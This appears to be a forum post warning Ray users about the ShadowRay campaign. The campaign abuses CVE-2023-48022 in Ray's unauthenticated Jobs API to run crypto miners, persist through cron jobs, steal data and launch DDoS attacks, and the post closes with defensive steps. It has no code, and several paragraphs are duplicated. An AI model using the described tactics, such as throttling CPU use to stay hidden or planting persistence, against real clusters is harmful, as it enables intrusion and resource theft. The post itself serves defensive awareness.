I’d like to bring your attention to a new cyber security issue I’ve learned about. This one is called ShadowRay and is able to commandeer Ray clusters to then mine cryptocurrency. Seems intense, right? If you use Ray for AI or high workloads, you should be aware of it.
In reality, here are the basics:
• They are employing a bug with the name CVE-2023-48022.
• This bug allows them to run any job on a Ray cluster with no password.
• Over 230,000 Ray Servers are publicly exposed and exploitable.
• Their primary goal is to run a Monero crypto miner (XMRig).
• They steal data, capture passwords, and may also utilize the server for DDoS.
All of this is running silently, meaning you likely wouldn’t even know it’s going on.
The hacker interacts with the Jobs API in Ray. Since it has no login, and no restrictions in place, the hacker simply submits a command to the Jobs API and Ray executes the command.
Step 2: Actions Taken by Hacker Once Inside
Once they gain access to your server, they take the following actions:
What’s Going On?
Hackers have successfully exploited a vulnerability in Ray. They exploit this vulnerable to access servers that are publicly exposed on the internet. After breaching the server, they will then get the server to run crypto-mining software to earn money for themselves.In reality, here are the basics:
• They are employing a bug with the name CVE-2023-48022.
• This bug allows them to run any job on a Ray cluster with no password.
• Over 230,000 Ray Servers are publicly exposed and exploitable.
• Their primary goal is to run a Monero crypto miner (XMRig).
• They steal data, capture passwords, and may also utilize the server for DDoS.
All of this is running silently, meaning you likely wouldn’t even know it’s going on.
How the Attack Works;
Step 1: Getting AccessThe hacker interacts with the Jobs API in Ray. Since it has no login, and no restrictions in place, the hacker simply submits a command to the Jobs API and Ray executes the command.
Step 2: Actions Taken by Hacker Once Inside
Once they gain access to your server, they take the following actions:
- Check your CPU and GPU capabilities.
- If you have a strong server (8 cores or more), they will begin mining from it.
- They will only use 60% of the CPU so you do not get suspicious.
- They will install cron jobs and system files as a stayer in your system.
- They will block other miners so that only their miner runs.
- Steal data from your machine.
- Open a door to your server so they can come back at will.
- Use your server to conduct DDoS attacks.
- Use AI written code to avoid making errors, provide anonymity, and hide better.
Why is This Important
If you run Ray clusters this should concern you. A lot of people think Ray only runs in trusted networks, when in fact many of these servers are open to the public internet. That is what hackers take advantage of.What Happens When You’re Attacked?
- Your server gets really slow.
- Your cloud bill gets even bigger.
- Your data can be stolen.
- A hacker could use your computer to attack someone else.
What You Should Do
Here’s what you do to protect yourself:- Stop public access to Ray (use firewalls).
- Implement a login/password for the Ray Dashboard and Jobs API.
- Keep an eye on your CPU for unusually high usage.
- Look for cron jobs, or unknown processes.
Last edited:
